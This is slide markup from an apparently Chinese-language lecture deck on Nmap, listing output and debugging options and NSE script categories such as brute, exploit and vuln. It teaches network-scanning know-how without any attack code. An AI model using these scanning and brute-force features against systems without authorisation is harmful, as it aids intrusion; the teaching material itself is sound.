                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>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7532989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>oA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> &lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>basename</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>輸出至所有格式</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>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2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5304165"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="10657" b="14272"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="130492" y="84045"/>
            <a:ext cx="850106" cy="638175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087754" y="155482"/>
            <a:ext cx="6291263" cy="61912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NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>掃描技術</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>輸出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5238933" y="1897017"/>
            <a:ext cx="184731" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="表格 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="130492" y="4441192"/>
          <a:ext cx="8584882" cy="815975"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2016341">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3388721400"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6568541">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="961049817"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="320675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                        <a:t>細節和調試選項</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
                        <a:t>--packet-trace</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>（跟踪發送和接收的報告文）</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2278849312"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="480060">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>其他輸出選項</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
                        <a:t>--append-output</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>在輸出文件中添加</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0"/>
                        <a:t>--resume &lt;filename&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>（繼續中斷的掃描）</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2774069899"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="投影片編號版面配置區 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30687239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2623185" y="1066800"/>
            <a:ext cx="6069330" cy="4872093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="10657" b="14272"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="105901"/>
            <a:ext cx="850106" cy="638175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884301" y="148349"/>
            <a:ext cx="7839075" cy="61912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400" dirty="0"/>
              <a:t>NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t> Scripting Engine (NSE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>掃描技術</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1350" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="204787" y="1714660"/>
            <a:ext cx="2098358" cy="4478149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1"/>
              <a:t>auth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>broadcast</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>brute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t>暴力破解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>dos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>exploit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t>攻擊</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>external</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1"/>
              <a:t>fuzzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t>模糊測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>intrusive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t> 掃漏惡意程式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0" err="1"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0"/>
              <a:t>  掃漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>Script Arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>Example Usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>Script Output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" b="1" dirty="0"/>
              <a:t>Script banner</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1500" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="投影片編號版面配置區 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4002568" y="6122744"/>
            <a:ext cx="4480778" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>https://nmap.org/nsedoc/categories/exploit.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="135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461576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5" name="內容版面配置區 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275513" y="906304"/>
            <a:ext cx="7818719" cy="4865846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="投影片編號版面配置區 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7644318" y="2284661"/>
            <a:ext cx="1189749" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>auth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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00195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D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-385763" y="717947"/>
            <a:ext cx="9915525" cy="5422106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372328" y="1021646"/>
            <a:ext cx="3006849" cy="600164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>brute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3300" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>暴力破解</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29362790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D16C3A51-89D0-4E4D-AA61-5A30A561532A}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3687539" y="1078319"/>
            <a:ext cx="4923888" cy="4424363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240773" y="1428958"/>
            <a:ext cx="2409825" cy="620108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="68580" tIns="34290" rIns="68580" bIns="3429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300" b="1" dirty="0">
                <a:effectLst>
